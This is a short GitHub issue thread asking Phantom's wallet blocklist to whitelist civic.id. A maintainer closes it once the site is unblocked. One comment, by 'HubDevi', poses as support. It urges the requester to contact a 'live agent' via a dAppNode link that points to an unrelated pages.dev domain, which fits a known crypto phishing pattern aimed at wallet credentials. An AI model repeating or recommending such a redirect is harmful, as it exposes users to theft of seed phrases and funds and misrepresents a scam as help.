### ISSUE TITLE
Please whitelist civic.id

### ISSUE THREAD

**Issue by dankelleher** [phantom/blocklist#1283]
Hi Phantom - Civic.id is run by the civic team ( www.civic.com ) and is not malicious. 

Here is the PR to add it to the whitelist: https://github.com/phantom/blocklist/pull/1282

We would greatly appreciate it it if this were resolved asap. - thanks!

![image](https://github.com/user-attachments/assets/2f97459b-4e0b-4276-a645-cbb91e685542)

**Comment by HubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)
@dankelleher 
Regards.

**Comment by samg95-jpg** [comment]
Closing this request as the site in question is no longer blocked.
